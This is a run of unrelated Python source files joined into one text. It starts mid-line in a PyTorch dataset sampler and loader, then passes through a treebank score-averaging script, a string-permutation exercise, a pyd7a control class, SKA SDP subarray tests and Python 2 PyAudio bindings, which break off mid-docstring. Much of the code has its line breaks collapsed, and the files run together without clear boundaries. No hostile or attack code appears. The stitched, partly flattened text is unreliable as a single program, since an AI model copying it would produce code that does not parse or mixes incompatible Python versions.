= indices[offset:offset+self.batch_size] pair_indices = [] for 
idx in batch_indices: y = self.dataset.get_class(idx) t = copy.deepcopy(self.dataset.classwise_indices[y]) t.pop(t.index(idx)) if len(t)>=(self.num_instances-1): class_indices = np.random.choice(t, size=self.num_instances-1, replace=False) else: class_indices = np.random.choice(t, size=self.num_instances-1, replace=True) pair_indices.extend(class_indices) yield batch_indices+pair_indices def __len__(self): if self.num_iterations is None: return (len(self.dataset)+self.batch_size-1) // (self.batch_size) else: return self.num_iterations class PairBatchSampler(Sampler): def __init__(self, dataset, batch_size, num_iterations=None): self.dataset = dataset self.batch_size = batch_size self.num_iterations = num_iterations def __iter__(self): indices = list(range(len(self.dataset))) random.shuffle(indices) for k in range(len(self)): if self.num_iterations is None: offset = k*self.batch_size batch_indices = indices[offset:offset+self.batch_size] else: batch_indices = random.sample(range(len(self.dataset)), self.batch_size) pair_indices = [] for idx in batch_indices: y = self.dataset.get_class(idx) pair_indices.append(random.choice(self.dataset.classwise_indices[y])) yield batch_indices + pair_indices def __len__(self): if self.num_iterations is None: return (len(self.dataset)+self.batch_size-1) // self.batch_size else: return self.num_iterations class DatasetWrapper(Dataset): # Additinoal attributes # - indices # - classwise_indices # - num_classes # - get_class def __init__(self, dataset, indices=None): self.base_dataset = dataset if indices is None: self.indices = list(range(len(dataset))) else: self.indices = indices # torchvision 0.2.0 compatibility if torchvision.__version__.startswith('0.2'): if isinstance(self.base_dataset, datasets.ImageFolder): self.base_dataset.targets = [s[1] for s in self.base_dataset.imgs] else: if self.base_dataset.train: self.base_dataset.targets = self.base_dataset.train_labels else: self.base_dataset.targets = self.base_dataset.test_labels self.classwise_indices = defaultdict(list) for i in range(len(self)): y = self.base_dataset.targets[self.indices[i]] self.classwise_indices[y].append(i) self.num_classes = max(self.classwise_indices.keys())+1 def __getitem__(self, i): return self.base_dataset[self.indices[i]] def __len__(self): return len(self.indices) def get_class(self, i): return self.base_dataset.targets[self.indices[i]] class ConcatWrapper(Dataset): # TODO: Naming @staticmethod def cumsum(sequence): r, s = [], 0 for e in sequence: l = len(e) r.append(l + s) s += l return r @staticmethod def numcls(sequence): s = 0 for e in sequence: l = e.num_classes s += l return s @staticmethod def clsidx(sequence): r, s, n = defaultdict(list), 0, 0 for e in sequence: l = e.classwise_indices for c in range(s, s + e.num_classes): t = np.asarray(l[c-s]) + n r[c] = t.tolist() s += e.num_classes n += len(e) return r def __init__(self, datasets): super(ConcatWrapper, self).__init__() assert len(datasets) > 0, 'datasets should not be an empty iterable' self.datasets = list(datasets) # for d in self.datasets: # assert not isinstance(d, IterableDataset), "ConcatDataset does not support IterableDataset" self.cumulative_sizes = self.cumsum(self.datasets) self.num_classes = self.numcls(self.datasets) self.classwise_indices = self.clsidx(self.datasets) def __len__(self): return self.cumulative_sizes[-1] def __getitem__(self, idx): if idx < 0: if -idx > len(self): raise ValueError("absolute value of index should not exceed dataset length") idx = len(self) + idx dataset_idx = 
bisect.bisect_right(self.cumulative_sizes, idx) if dataset_idx == 0: sample_idx = idx else: sample_idx = idx - self.cumulative_sizes[dataset_idx - 1] return self.datasets[dataset_idx][sample_idx] def get_class(self, idx): if idx < 0: if -idx > len(self): raise ValueError("absolute value of index should not exceed dataset length") idx = len(self) + idx dataset_idx = bisect.bisect_right(self.cumulative_sizes, idx) if dataset_idx == 0: sample_idx = idx else: sample_idx = idx - self.cumulative_sizes[dataset_idx - 1] true_class = self.datasets[dataset_idx].base_dataset.targets[self.datasets[dataset_idx].indices[sample_idx]] return self.datasets[dataset_idx].base_dataset.target_transform(true_class) @property def cummulative_sizes(self): warnings.warn("cummulative_sizes attribute is renamed to " "cumulative_sizes", DeprecationWarning, stacklevel=2) return self.cumulative_sizes def load_dataset(name, root, sample='default', **kwargs): # Dataset if name in ['imagenet','tinyimagenet', 'CUB200', 'STANFORD120', 'MIT67']: # TODO if name == 'tinyimagenet': transform_train = transforms.Compose([ transforms.RandomResizedCrop(32), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)) ]) transform_test = transforms.Compose([ transforms.Resize(32), transforms.ToTensor(), transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)) ]) train_val_dataset_dir = os.path.join(root, "tinyimagenet/train") test_dataset_dir = os.path.join(root, "tinyimagenet/val") trainset = DatasetWrapper(datasets.ImageFolder(root=train_val_dataset_dir, transform=transform_train)) valset = DatasetWrapper(datasets.ImageFolder(root=test_dataset_dir, transform=transform_test)) elif name == 'imagenet': transform_train = transforms.Compose([ transforms.RandomResizedCrop(224), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)) ]) transform_test = transforms.Compose([ transforms.Resize(256), transforms.CenterCrop(224), transforms.ToTensor(), transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)) ]) train_val_dataset_dir = os.path.join(root, "train") test_dataset_dir = os.path.join(root, "val") trainset = DatasetWrapper(datasets.ImageFolder(root=train_val_dataset_dir, transform=transform_train)) valset = DatasetWrapper(datasets.ImageFolder(root=test_dataset_dir, transform=transform_test)) else: transform_train = transforms.Compose([ transforms.RandomResizedCrop(224), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)) ]) transform_test = transforms.Compose([ transforms.Resize(256), transforms.CenterCrop(224), transforms.ToTensor(), transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)) ]) train_val_dataset_dir = os.path.join(root, name, "train") test_dataset_dir = os.path.join(root, name, "test") trainset = DatasetWrapper(datasets.ImageFolder(root=train_val_dataset_dir, transform=transform_train)) valset = DatasetWrapper(datasets.ImageFolder(root=test_dataset_dir, transform=transform_test)) elif name.startswith('cifar'): transform_train = transforms.Compose([ transforms.RandomCrop(32, padding=4), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) if name == 'cifar10': CIFAR = 
datasets.CIFAR10
        else:
            CIFAR = datasets.CIFAR100
        trainset = DatasetWrapper(CIFAR(root, train=True, download=True, transform=transform_train))
        valset = DatasetWrapper(CIFAR(root, train=False, download=True, transform=transform_test))
    else:
        raise Exception('Unknown dataset: {}'.format(name))

    # Sampler
    if sample == 'default':
        # get_train_sampler = lambda d: BatchSampler(RandomSampler(d), kwargs['batch_size'], False)
        get_train_sampler = lambda d: IdentityBatchSampler(d, kwargs['batch_size'], kwargs['num_instances'])
        get_test_sampler = lambda d: BatchSampler(SequentialSampler(d), kwargs['batch_size'], False)
    elif sample == 'pair':
        get_train_sampler = lambda d: PairBatchSampler(d, kwargs['batch_size'])
        get_test_sampler = lambda d: BatchSampler(SequentialSampler(d), kwargs['batch_size'], False)
    else:
        raise Exception('Unknown sampling: {}'.format(sample))

    trainloader = DataLoader(trainset, batch_sampler=get_train_sampler(trainset), num_workers=8)
    valloader = DataLoader(valset, batch_sampler=get_test_sampler(valset), num_workers=8)
    return trainloader, valloader

import os
from allennlp.common import Params
import myutils

udPath = 'data/ud-treebanks-v' + myutils.UDversion + '/'
UDSETS = []
for UDdir in os.listdir(udPath):
    if not UDdir.startswith("UD"):
        continue
    _, _, test = myutils.getTrainDevTest(udPath + UDdir)
    if test != '' and myutils.hasColumn(test, 1):
        UDSETS.append(UDdir)

outDir = 'preds/'
for setting in ['self', 'concat.smoothed', 'sepDec.smoothed', 'datasetEmbeds.smoothed', 'concat']:
    scores = []
    for UDdir in UDSETS:
        seed_scores = []    # per-treebank scores, averaged over seeds
        for seed in myutils.seeds:
            if setting == 'self':
                output = 'preds/self.' + UDdir
            else:
                output = 'preds/fullUD' + setting + '.' + str(seed) + '.' + UDdir
            output = output + '.test.' + str(seed) + '.conllu.eval'
            if os.path.isfile(output) and os.stat(output).st_size != 0 and os.stat(output).st_size < 100:
                seed_scores.append(float(open(output).readline().strip().split()[-1]))
            else:
                seed_scores.append(0.0)
                print("NF", output)
        scores.append(sum(seed_scores) / len(seed_scores))
    print(setting + ' & ' + str(round(sum(scores) / len(scores), 2)))
    print()

glue = Params.from_file('configs/glue.json')
for setting in ['glue', 'glue.smoothSampling', 'glue.single']:
    scores = []
    for task in glue:
        if task == 'wnli':
            continue
        output = outDir + setting + '.' + task + '.eval'
        if os.path.isfile(output):
            score = float(open(output).readline().split()[0])
        else:
            score = 0.0
        scores.append(score)
    print(setting + ' & ' + str(round(100 * sum(scores) / len(scores), 2)))

'''
Problem: Determine if two strings are permutations.
Assumptions: String is composed of lower 128 ASCII characters.
Capitalization matters.
'''
def isPerm(s1, s2):
    if len(s1) != len(s2):
        return False
    arr1 = [0] * 128
    arr2 = [0] * 128
    for c, d in zip(s1, s2):
        arr1[ord(c)] += 1
        arr2[ord(d)] += 1
    for i in range(len(arr1)):
        if arr1[i] != arr2[i]:
            return False
    return True

def test():
    s1 = "read"
    s2 = "dear"
    assert isPerm(s1, s2) == True
    s1 = "read"
    s2 = "red"
    assert isPerm(s1, s2) == False
    s1 = "read"
    s2 = "race"
    assert isPerm(s1, s2) == False
    s1 = "Read"
    s2 = "read"
    assert isPerm(s1, s2) == False
    print("Test passed")

test()

utils/helpers.py
def progress_bar_alive():
    """generator progress bar alive status"""
    options, i = ["|", "/", "─", "\\"], 0
    while True:
        yield options[i]
        i = (i + 1) % 4

d7a/sp/autoscaling_ctrl.py
#
# Copyright (c) 2015-2021 University of Antwerp, Aloxy NV.
#
# This file is part of pyd7a.
# See https://github.com/Sub-IoT/pyd7a for further info.
# # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # author: <> # class implementation of autoscaling control from enum import Enum from d7a.support.schema import Validatable, Types class AutoscalingCtrl(Validatable): SCHEMA = [{ "toggle": Types.BOOLEAN(), "rxlev" : Types.BOOLEAN(), "on" : Types.BOOLEAN() }] def __init__(self, toggle=False, rxlev=False, on=False): self.toggle = toggle self.rxlev = rxlev self.on = on super(AutoscalingCtrl, self).__init__() def __iter__(self): byte = 0 if self.on: byte |= 1 # b0 if self.rxlev: byte |= 1 << 1 # b1 if self.toggle: byte |= 1 << 2 # b2 yield byte @staticmethod def parse(s): _rfu = s.read("uint:5") toggle = s.read("bool") rxlev = s.read("bool") on = s.read("bool") return AutoscalingCtrl(toggle=toggle, rxlev=rxlev, on=on) def __str__(self): return str(self.as_dict())"""High-level API tests on subarrays.""" import os import pytest import ska_sdp_config # pylint: disable=missing-docstring,redefined-outer-name PREFIX = "/__test_subarray" # pylint: disable=W0212 @pytest.fixture(scope="session") def cfg(): host = os.getenv("SDP_TEST_HOST", "127.0.0.1") with ska_sdp_config.Config(global_prefix=PREFIX, host=host) as cfg: cfg.backend.delete(PREFIX, must_exist=False, recursive=True) yield cfg cfg.backend.delete(PREFIX, must_exist=False, recursive=True) def test_subarray_list(cfg): subarray1_id = "01" subarray2_id = "02" # Check subarray list is empty for txn in cfg.txn(): subarray_ids = txn.list_subarrays() assert subarray_ids == [] # Create first subarray for txn in cfg.txn(): txn.create_subarray(subarray1_id, {}) # Check subarray list has entry for txn in cfg.txn(): subarray_ids = txn.list_subarrays() assert subarray_ids == [subarray1_id] # Create second subarray for txn in cfg.txn(): txn.create_subarray(subarray2_id, {}) # Check subarray list has both entries for txn in cfg.txn(): subarray_ids = txn.list_subarrays() assert subarray_ids == sorted([subarray1_id, subarray2_id]) def test_subarray_create_update(cfg): subarray_id = "03" state1 = { "sbi_id": "sbi-test-20200727-00000", "state": "ON", "obs_state": "READY", "scan_type": "science", "scan_id": None, } state2 = { "sbi_id": "sbi-test-20200727-00000", "state": "ON", "obs_state": "SCANNING", "scan_type": "science", "scan_id": 1, } # Subarray has not been created, so should return None for txn in cfg.txn(): state = txn.get_subarray(subarray_id) assert state is None # Create subarray as state1 for txn in cfg.txn(): txn.create_subarray(subarray_id, state1) # Read subarray and check it is equal to state1 for txn in cfg.txn(): state = txn.get_subarray(subarray_id) assert state == state1 # Trying to recreate should raise a collision exception for txn in cfg.txn(): with pytest.raises(ska_sdp_config.ConfigCollision): txn.create_subarray(subarray_id, state1) # Update subarray to state2 for txn in cfg.txn(): txn.update_subarray(subarray_id, state2) # Read subarray and check it is equal to state2 for txn in cfg.txn(): state = txn.get_subarray(subarray_id) assert state == state2 if __name__ == "__main__": pytest.main() 0 # PyAudio 
: Python Bindings for PortAudio. # Copyright (c) 2006-2010 # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ PyAudio : Python Bindings for PortAudio v19. **These bindings only support PortAudio blocking mode.** :var PaSampleFormat: A list of all PortAudio ``PaSampleFormat`` value constants. See: `paInt32`, `paInt24`, `paInt16`, `paInt8`, and `paUInt8`. :var PaHostApiTypeId: A list of all PortAudio ``PaHostApiTypeId`` constants. See: `paInDevelopment`, `paDirectSound`, `paMME`, `paASIO`, `paSoundManager`, `paCoreAudio`, `paOSS`, `paALSA`, `paAL`, *et al...* :var PaErrorCode: A list of all PortAudio ``PaErrorCode`` constants. Typically, error code constants are included in Python exception objects (as the second argument). See: `paNoError`, `paNotInitialized`, `paUnanticipatedHostError`, *et al...* :group PortAudio Constants: PaSampleFormat, PaHostApiTypeId, PaErrorCode :group PaSampleFormat Values: paFloat32, paInt32, paInt24, paInt16, paInt8, paUInt8, paCustomFormat :group PaHostApiTypeId Values: paInDevelopment, paDirectSound, paMME, paASIO, paSoundManager, paCoreAudio, paOSS, paALSA paAL, paBeOS, paWDMKS, paJACK, paWASAPI, paNoDevice :group PaErrorCode Values: paNoError, paNotInitialized, paUnanticipatedHostError, paInvalidChannelCount, paInvalidSampleRate, paInvalidDevice, paInvalidFlag, paSampleFormatNotSupported, paBadIODeviceCombination, paInsufficientMemory, paBufferTooBig, paBufferTooSmall, paNullCallback, paBadStreamPtr, paTimedOut, paInternalError, paDeviceUnavailable, paIncompatibleHostApiSpecificStreamInfo, paStreamIsStopped, paStreamIsNotStopped, paInputOverflowed, paOutputUnderflowed, paHostApiNotFound, paInvalidHostApi, paCanNotReadFromACallbackStream, paCanNotWriteToACallbackStream, paCanNotReadFromAnOutputOnlyStream, paCanNotWriteToAnInputOnlyStream, paIncompatibleStreamHostApi :group Stream Conversion Convenience Functions: get_sample_size, get_format_from_width :group PortAudio version: get_portaudio_version, get_portaudio_version_text :sort: PaSampleFormat, PaHostApiTypeId, PaErrorCode :sort: PortAudio Constants, PaSampleFormat Values, PaHostApiTypeId Values, PaErrorCode Values """ __author__ = "" __version__ = "0.2.4" __docformat__ = "restructuredtext en" import sys # attempt to import PortAudio try: import _portaudio as pa except ImportError: print "Please build and install the PortAudio Python bindings first." 
sys.exit(-1) # Try to use Python 2.4's built in `set' try: a = set() del a except NameError: from sets import Set as set ############################################################ # GLOBALS ############################################################ ##### PaSampleFormat Sample Formats ##### paFloat32 = pa.paFloat32 paInt32 = pa.paInt32 paInt24 = pa.paInt24 paInt16 = pa.paInt16 paInt8 = pa.paInt8 paUInt8 = pa.paUInt8 paCustomFormat = pa.paCustomFormat # group them together for epydoc PaSampleFormat = ['paFloat32', 'paInt32', 'paInt24', 'paInt16', 'paInt8', 'paUInt8', 'paCustomFormat'] ###### HostAPI TypeId ##### paInDevelopment = pa.paInDevelopment paDirectSound = pa.paDirectSound paMME = pa.paMME paASIO = pa.paASIO paSoundManager = pa.paSoundManager paCoreAudio = pa.paCoreAudio paOSS = pa.paOSS paALSA = pa.paALSA paAL = pa.paAL paBeOS = pa.paBeOS paWDMKS = pa.paWDMKS paJACK = pa.paJACK paWASAPI = pa.paWASAPI paNoDevice = pa.paNoDevice # group them together for epydoc PaHostApiTypeId = ['paInDevelopment', 'paDirectSound', 'paMME', 'paASIO', 'paSoundManager', 'paCoreAudio', 'paOSS', 'paALSA', 'paAL', 'paBeOS', 'paWDMKS', 'paJACK', 'paWASAPI', 'paNoDevice'] ###### portaudio error codes ##### paNoError = pa.paNoError paNotInitialized = pa.paNotInitialized paUnanticipatedHostError = pa.paUnanticipatedHostError paInvalidChannelCount = pa.paInvalidChannelCount paInvalidSampleRate = pa.paInvalidSampleRate paInvalidDevice = pa.paInvalidDevice paInvalidFlag = pa.paInvalidFlag paSampleFormatNotSupported = pa.paSampleFormatNotSupported paBadIODeviceCombination = pa.paBadIODeviceCombination paInsufficientMemory = pa.paInsufficientMemory paBufferTooBig = pa.paBufferTooBig paBufferTooSmall = pa.paBufferTooSmall paNullCallback = pa.paNullCallback paBadStreamPtr = pa.paBadStreamPtr paTimedOut = pa.paTimedOut paInternalError = pa.paInternalError paDeviceUnavailable = pa.paDeviceUnavailable paIncompatibleHostApiSpecificStreamInfo = pa.paIncompatibleHostApiSpecificStreamInfo paStreamIsStopped = pa.paStreamIsStopped paStreamIsNotStopped = pa.paStreamIsNotStopped paInputOverflowed = pa.paInputOverflowed paOutputUnderflowed = pa.paOutputUnderflowed paHostApiNotFound = pa.paHostApiNotFound paInvalidHostApi = pa.paInvalidHostApi paCanNotReadFromACallbackStream = pa.paCanNotReadFromACallbackStream paCanNotWriteToACallbackStream = pa.paCanNotWriteToACallbackStream paCanNotReadFromAnOutputOnlyStream = pa.paCanNotReadFromAnOutputOnlyStream paCanNotWriteToAnInputOnlyStream = pa.paCanNotWriteToAnInputOnlyStream paIncompatibleStreamHostApi = pa.paIncompatibleStreamHostApi # group them together for epydoc PaErrorCode = ['paNoError', 'paNotInitialized', 'paUnanticipatedHostError', 'paInvalidChannelCount', 'paInvalidSampleRate', 'paInvalidDevice', 'paInvalidFlag', 'paSampleFormatNotSupported', 'paBadIODeviceCombination', 'paInsufficientMemory', 'paBufferTooBig', 'paBufferTooSmall', 'paNullCallback', 'paBadStreamPtr', 'paTimedOut', 'paInternalError', 'paDeviceUnavailable', 'paIncompatibleHostApiSpecificStreamInfo', 'paStreamIsStopped', 'paStreamIsNotStopped', 'paInputOverflowed', 'paOutputUnderflowed', 'paHostApiNotFound', 'paInvalidHostApi', 'paCanNotReadFromACallbackStream', 'paCanNotWriteToACallbackStream', 'paCanNotReadFromAnOutputOnlyStream', 'paCanNotWriteToAnInputOnlyStream', 'paIncompatibleStreamHostApi'] ############################################################ # Convenience Functions ############################################################ def get_sample_size(format): """ Returns the size (in bytes) for 
the specified sample `format` (a `PaSampleFormat` constant). :param `format`: PortAudio sample format constant `PaSampleFormat`. :raises ValueError: Invalid specified `format`. :rtype: int """ return pa.get_sample_size(format) def get_format_from_width(width, unsigned = True): """ Returns a PortAudio format constant for the specified `width`. :param `width`: The desired sample width in bytes (1, 2, 3, or 4) :param `unsigned`: For 1 byte width, specifies signed or unsigned format. :raises ValueError: for invalid `width` :rtype: `PaSampleFormat` """ if width == 1: if unsigned: return paUInt8 else: return paInt8 elif width == 2: return paInt16 elif width == 3: return paInt24 elif width == 4: return paFloat32 else: raise ValueError, "Invalid width: %d" % width ############################################################ # Versioning ############################################################ def get_portaudio_version(): """ Returns portaudio version. :rtype: str """ return pa.get_version() def get_portaudio_version_text(): """ Returns PortAudio version as a text string. :rtype: str """ return pa.get_version_text() ############################################################ # Wrapper around _portaudio Stream (Internal) ############################################################ # Note: See PyAudio class below for main export. class Stream: """ PortAudio Stream Wrapper. Use `PyAudio.open` to make a new `Stream`. :group Opening and Closing: __init__, close :group Stream Info: get_input_latency, get_output_latency, get_time, get_cpu_load :group Stream Management: start_stream, stop_stream, is_active, is_stopped :group Input Output: write, read, get_read_available, get_write_available """ def __init__(self, PA_manager, rate, channels, format, input = False, output = False, input_device_index = None, output_device_index = None, frames_per_buffer = 1024, start = True, input_host_api_specific_stream_info = None, output_host_api_specific_stream_info = None): """ Initialize a stream; this should be called by `PyAudio.open`. A stream can either be input, output, or both. :param `PA_manager`: A reference to the managing `PyAudio` instance :param `rate`: Sampling rate :param `channels`: Number of channels :param `format`: Sampling size and format. See `PaSampleFormat`. :param `input`: Specifies whether this is an input stream. Defaults to False. :param `output`: Specifies whether this is an output stream. Defaults to False. :param `input_device_index`: Index of Input Device to use. Unspecified (or None) uses default device. Ignored if `input` is False. :param `output_device_index`: Index of Output Device to use. Unspecified (or None) uses the default device. Ignored if `output` is False. :param `frames_per_buffer`: Specifies the number of frames per buffer. :param `start`: Start the stream running immediately. Defaults to True. In general, there is no reason to set this to false. :param `input_host_api_specific_stream_info`: Specifies a host API specific stream information data structure for input. See `PaMacCoreStreamInfo`. :param `output_host_api_specific_stream_info`: Specifies a host API specific stream information data structure for output. See `PaMacCoreStreamInfo`. :raise ValueError: Neither input nor output are set True. """ # no stupidity allowed if not (input or output): raise ValueError, \ "Must specify an input or output stream." # remember parent self._parent = PA_manager # remember if we are an: input, output (or both) self._is_input = input self._is_output = output # are we running? 
self._is_running = start # remember some parameters self._rate = rate self._channels = channels self._format = format self._frames_per_buffer = frames_per_buffer arguments = { 'rate' : rate, 'channels' : channels, 'format' : format, 'input' : input, 'output' : output, 'input_device_index' : input_device_index, 'output_device_index' : output_device_index, 'frames_per_buffer' : frames_per_buffer} if input_host_api_specific_stream_info: _l = input_host_api_specific_stream_info arguments[ 'input_host_api_specific_stream_info' ] = _l._get_host_api_stream_object() if output_host_api_specific_stream_info: _l = output_host_api_specific_stream_info arguments[ 'output_host_api_specific_stream_info' ] = _l._get_host_api_stream_object() # calling pa.open returns a stream object self._stream = pa.open(**arguments) self._input_latency = self._stream.inputLatency self._output_latency = self._stream.outputLatency if self._is_running: pa.start_stream(self._stream) def close(self): """ Close the stream """ pa.close(self._stream) self._is_running = False self._parent._remove_stream(self) ############################################################ # Stream Info ############################################################ def get_input_latency(self): """ Return the input latency. :rtype: float """ return self._stream.inputLatency def get_output_latency(self): """ Return the input latency. :rtype: float """ return self._stream.outputLatency def get_time(self): """ Return stream time. :rtype: float """ return pa.get_stream_time(self._stream) def get_cpu_load(self): """ Return the CPU load. (Note: this is always 0.0 for the blocking API.) :rtype: float """ return pa.get_stream_cpu_load(self._stream) ############################################################ # Stream Management ############################################################ def start_stream(self): """ Start the stream. """ if self._is_running: return pa.start_stream(self._stream) self._is_running = True def stop_stream(self): """ Stop the stream. Once the stream is stopped, one may not call write or read. However, one may call start_stream to resume the stream. """ if not self._is_running: return pa.stop_stream(self._stream) self._is_running = False def is_active(self): """ Returns whether the stream is active. :rtype: bool """ return pa.is_stream_active(self._stream) def is_stopped(self): """ Returns whether the stream is stopped. :rtype: bool """ return pa.is_stream_stopped(self._stream) ############################################################ # Reading/Writing ############################################################ def write(self, frames, num_frames = None, exception_on_underflow = False): """ Write samples to the stream. :param `frames`: The frames of data. :param `num_frames`: The number of frames to write. Defaults to None, in which this value will be automatically computed. :param `exception_on_underflow`: Specifies whether an exception should be thrown (or silently ignored) on buffer underflow. Defaults to False for improved performance, especially on slower platforms. :raises IOError: if the stream is not an output stream or if the write operation was unsuccessful. 
:rtype: `None` """ if not self._is_output: raise IOError("Not output stream", paCanNotWriteToAnInputOnlyStream) if num_frames == None: # determine how many frames to read width = get_sample_size(self._format) num_frames = len(frames) / (self._channels * width) #print len(frames), self._channels, self._width, num_frames pa.write_stream(self._stream, frames, num_frames, exception_on_underflow) def read(self, num_frames): """ Read samples from the stream. :param `num_frames`: The number of frames to read. :raises IOError: if stream is not an input stream or if the read operation was unsuccessful. :rtype: str """ if not self._is_input: raise IOError("Not input stream", paCanNotReadFromAnOutputOnlyStream) return pa.read_stream(self._stream, num_frames) def get_read_available(self): """ Return the number of frames that can be read without waiting. :rtype: int """ return pa.get_stream_read_available(self._stream) def get_write_available(self): """ Return the number of frames that can be written without waiting. :rtype: int """ return pa.get_stream_write_available(self._stream) ############################################################ # Main Export ############################################################ class PyAudio: """ Python interface to PortAudio. Provides methods to: - initialize and terminate PortAudio - open and close streams - query and inspect the available PortAudio Host APIs - query and inspect the available PortAudio audio devices Use this class to open and close streams. :group Stream Management: open, close :group Host API: get_host_api_count, get_default_host_api_info, get_host_api_info_by_type, get_host_api_info_by_index, get_device_info_by_host_api_device_index :group Device API: get_device_count, is_format_supported, get_default_input_device_info, get_default_output_device_info, get_device_info_by_index :group Stream Format Conversion: get_sample_size, get_format_from_width """ ############################################################ # Initialization and Termination ############################################################ def __init__(self): """ Initialize PortAudio. """ pa.initialize() self._streams = set() def terminate(self): """ Terminate PortAudio. :attention: Be sure to call this method for every instance of this object to release PortAudio resources. """ for stream in self._streams: stream.close() self._streams = set() pa.terminate() ############################################################ # Stream Format ############################################################ def get_sample_size(self, format): """ Returns the size (in bytes) for the specified sample `format` (a `PaSampleFormat` constant). :param `format`: Sample format constant (`PaSampleFormat`). :raises ValueError: Invalid specified `format`. :rtype: int """ return pa.get_sample_size(format) def get_format_from_width(self, width, unsigned = True): """ Returns a PortAudio format constant for the specified `width`. :param `width`: The desired sample width in bytes (1, 2, 3, or 4) :param `unsigned`: For 1 byte width, specifies signed or unsigned format. 
:raises ValueError: for invalid `width` :rtype: `PaSampleFormat` """ if width == 1: if unsigned: return paUInt8 else: return paInt8 elif width == 2: return paInt16 elif width == 3: return paInt24 elif width == 4: return paFloat32 else: raise ValueError, "Invalid width: %d" % width ############################################################ # Stream Factory ############################################################ def open(self, *args, **kwargs): """ Open a new stream. See constructor for `Stream.__init__` for parameter details. :returns: `Stream` """ stream = Stream(self, *args, **kwargs) self._streams.add(stream) return stream def close(self, stream): """ Close a stream. Typically use `Stream.close` instead. :param `stream`: An instance of the `Stream` object. :raises ValueError: if stream does not exist. """ if stream not in self._streams: raise ValueError, "Stream `%s' not found" % str(stream) stream.close() def _remove_stream(self, stream): """ Internal method. Removes a stream. :param `stream`: An instance of the `Stream` object. """ if stream in self._streams: self._streams.remove(stream) ############################################################ # Host API Inspection ############################################################ def get_host_api_count(self): """ Return the number of PortAudio Host APIs. :rtype: int """ return pa.get_host_api_count() def get_default_host_api_info(self): """ Return a dictionary containing the default Host API parameters. The keys of the dictionary mirror the data fields of PortAudio's ``PaHostApiInfo`` structure. :raises IOError: if no default input device available :rtype: dict """ defaultHostApiIndex = pa.get_default_host_api() return self.get_host_api_info_by_index(defaultHostApiIndex) def get_host_api_info_by_type(self, host_api_type): """ Return a dictionary containing the Host API parameters for the host API specified by the `host_api_type`. The keys of the dictionary mirror the data fields of PortAudio's ``PaHostApiInfo`` structure. :param `host_api_type`: The desired Host API (`PaHostApiTypeId` constant). :raises IOError: for invalid `host_api_type` :rtype: dict """ index = pa.host_api_type_id_to_host_api_index(host_api_type) return self.get_host_api_info_by_index(index) def get_host_api_info_by_index(self, host_api_index): """ Return a dictionary containing the Host API parameters for the host API specified by the `host_api_index`. The keys of the dictionary mirror the data fields of PortAudio's ``PaHostApiInfo`` structure. :param `host_api_index`: The host api index. :raises IOError: for invalid `host_api_index` :rtype: dict """ return self._make_host_api_dictionary( host_api_index, pa.get_host_api_info(host_api_index) ) def get_device_info_by_host_api_device_index(self, host_api_index, host_api_device_index): """ Return a dictionary containing the Device parameters for a given Host API's n'th device. The keys of the dictionary mirror the data fields of PortAudio's ``PaDeviceInfo`` structure. :param `host_api_index`: The Host API index number. :param `host_api_device_index`: The *n* 'th device of the host API. :raises IOError: for invalid indices :rtype: dict """ long_method_name = pa.host_api_device_index_to_device_index device_index = long_method_name(host_api_index, host_api_device_index) return self.get_device_info_by_index(device_index) def _make_host_api_dictionary(self, index, host_api_struct): """ Internal method to create Host API dictionary that mirrors PortAudio's ``PaHostApiInfo`` structure. 
:rtype: dict """ return {'index' : index, 'structVersion' : host_api_struct.structVersion, 'type' : host_api_struct.type, 'name' : host_api_struct.name, 'deviceCount' : host_api_struct.deviceCount, 'defaultInputDevice' : host_api_struct.defaultInputDevice, 'defaultOutputDevice' : host_api_struct.defaultOutputDevice} ############################################################ # Device Inspection ############################################################ def get_device_count(self): """ Return the number of PortAudio Host APIs. :rtype: int """ return pa.get_device_count() def is_format_supported(self, rate, input_device = None, input_channels = None, input_format = None, output_device = None, output_channels = None, output_format = None): """ Check to see if specified device configuration is supported. Returns True if the configuration is supported; throws a ValueError exception otherwise. :param `rate`: Specifies the desired rate (in Hz) :param `input_device`: The input device index. Specify `None` (default) for half-duplex output-only streams. :param `input_channels`: The desired number of input channels. Ignored if `input_device` is not specified (or `None`). :param `input_format`: PortAudio sample format constant defined in this module :param `output_device`: The output device index. Specify `None` (default) for half-duplex input-only streams. :param `output_channels`: The desired number of output channels. Ignored if `input_device` is not specified (or `None`). :param `output_format`: PortAudio sample format constant 